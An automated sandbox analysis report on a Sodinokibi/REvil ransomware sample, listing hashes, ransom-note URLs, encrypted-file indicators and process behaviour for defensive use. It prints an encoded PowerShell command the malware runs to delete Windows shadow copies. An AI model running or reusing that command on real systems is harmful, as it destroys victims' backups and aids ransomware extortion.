Analysis
- max time kernel: 83s
- max time network: 94s
- platform: windows7_x64
- resource: win7
- submitted: 25-08-2020 12:17

Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: 55.exe, Resource: win7)
- Behavioral task: behavioral2 (Sample: 55.exe, Resource: win10v200722)
General
- Target: 55.exe
- Size: 289KB
- MD5: 500286eaf9eb11b34eb413bb0df5543b
- SHA1: b889ff1138b2bd7a3033ca4c4868189dc8588f9b
- SHA256: f67d2bb9157ba5ccacbe051ac737812226fb2b43fe209867ae276695a8a929a4
- SHA512: 65ce297688900f0c7b1eb3a327771eff79e366290761613b364f463787f66a46d14127e1a644b5fb8f26befdf90ce100110cf47107b9457f971ca8056402782a
Malware Config
Extracted from: C:\mg6590u252-readme.txt
- sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C3DAA270FDF09AE8
- http://decryptor.cc/C3DAA270FDF09AE8
Signatures

- Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

- Modifies extensions of user files (13 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: 55.exe
description: ioc (process)
  File renamed: C:\Users\Admin\Pictures\ExportDisconnect.tif => \??\c:\users\admin\pictures\ExportDisconnect.tif.mg6590u252 (55.exe)
  File renamed: C:\Users\Admin\Pictures\StopExport.crw => \??\c:\users\admin\pictures\StopExport.crw.mg6590u252 (55.exe)
  File renamed: C:\Users\Admin\Pictures\UndoUnprotect.tiff => \??\c:\users\admin\pictures\UndoUnprotect.tiff.mg6590u252 (55.exe)
  File renamed: C:\Users\Admin\Pictures\UnblockFind.png => \??\c:\users\admin\pictures\UnblockFind.png.mg6590u252 (55.exe)
  File renamed: C:\Users\Admin\Pictures\RepairEdit.tif => \??\c:\users\admin\pictures\RepairEdit.tif.mg6590u252 (55.exe)
  File renamed: C:\Users\Admin\Pictures\RequestResize.png => \??\c:\users\admin\pictures\RequestResize.png.mg6590u252 (55.exe)
  File renamed: C:\Users\Admin\Pictures\SelectRestore.tif => \??\c:\users\admin\pictures\SelectRestore.tif.mg6590u252 (55.exe)
  File renamed: C:\Users\Admin\Pictures\SkipClose.tif => \??\c:\users\admin\pictures\SkipClose.tif.mg6590u252 (55.exe)
  File renamed: C:\Users\Admin\Pictures\ImportComplete.png => \??\c:\users\admin\pictures\ImportComplete.png.mg6590u252 (55.exe)
  File opened for modification: \??\c:\users\admin\pictures\StepRead.tiff (55.exe)
  File renamed: C:\Users\Admin\Pictures\PublishRestore.crw => \??\c:\users\admin\pictures\PublishRestore.crw.mg6590u252 (55.exe)
  File opened for modification: \??\c:\users\admin\pictures\UndoUnprotect.tiff (55.exe)
  File renamed: C:\Users\Admin\Pictures\StepRead.tiff => \??\c:\users\admin\pictures\StepRead.tiff.mg6590u252 (55.exe)

- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 5 IoCs)
Processes: vssvc.exe
description: ioc (process)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)

- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: 55.exe
description: ioc (process)
  Set value (str): \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6wb0n.bmp" (55.exe)
- Drops file in Program Files directory (22 IoCs)
Processes: 55.exe
description: ioc (process)
  File opened for modification: \??\c:\program files\CompareFind.wmx (55.exe)
  File opened for modification: \??\c:\program files\DisconnectPing.txt (55.exe)
  File opened for modification: \??\c:\program files\EnterResize.bmp (55.exe)
  File opened for modification: \??\c:\program files\MoveRedo.wmx (55.exe)
  File opened for modification: \??\c:\program files\ResetShow.dotm (55.exe)
  File opened for modification: \??\c:\program files\ResumeDeny.TTS (55.exe)
  File opened for modification: \??\c:\program files\SelectClear.dxf (55.exe)
  File opened for modification: \??\c:\program files\UnprotectOut.vstm (55.exe)
  File created: \??\c:\program files (x86)\mg6590u252-readme.txt (55.exe)
  File opened for modification: \??\c:\program files\AssertUnlock.ADTS (55.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\mg6590u252-readme.txt (55.exe)
  File opened for modification: \??\c:\program files\PushSelect.tiff (55.exe)
  File opened for modification: \??\c:\program files\SaveStart.clr (55.exe)
  File opened for modification: \??\c:\program files\TestMerge.eprtx (55.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\mg6590u252-readme.txt (55.exe)
  File created: \??\c:\program files\mg6590u252-readme.txt (55.exe)
  File opened for modification: \??\c:\program files\UnpublishGroup.sql (55.exe)
  File opened for modification: \??\c:\program files\WaitShow.ram (55.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\mg6590u252-readme.txt (55.exe)
  File opened for modification: \??\c:\program files\GrantPush.avi (55.exe)
  File opened for modification: \??\c:\program files\ShowRemove.gif (55.exe)
  File opened for modification: \??\c:\program files\StartPublish.potm (55.exe)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: 55.exe, powershell.exe
pid: process
  1464: 55.exe
  1016: powershell.exe
  1016: powershell.exe

- Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: 55.exe, powershell.exe, vssvc.exe
description: pid (process)
  Token: SeDebugPrivilege: 1464 (55.exe)
  Token: SeDebugPrivilege: 1016 (powershell.exe)
  Token: SeBackupPrivilege: 1916 (vssvc.exe)
  Token: SeRestorePrivilege: 1916 (vssvc.exe)
  Token: SeAuditPrivilege: 1916 (vssvc.exe)
  Token: SeTakeOwnershipPrivilege: 1464 (55.exe)

- Suspicious use of WriteProcessMemory (4 IoCs)
Processes: 55.exe
description: pid (process) -> target process
  PID 1464 wrote to memory of 1016: 1464 (55.exe) -> powershell.exe
  PID 1464 wrote to memory of 1016: 1464 (55.exe) -> powershell.exe
  PID 1464 wrote to memory of 1016: 1464 (55.exe) -> powershell.exe
  PID 1464 wrote to memory of 1016: 1464 (55.exe) -> powershell.exe
Processes

C:\Users\Admin\AppData\Local\Temp\55.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\55.exe"
  PID: 1464
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 1464)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    PID: 1016
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 1044

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1916
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken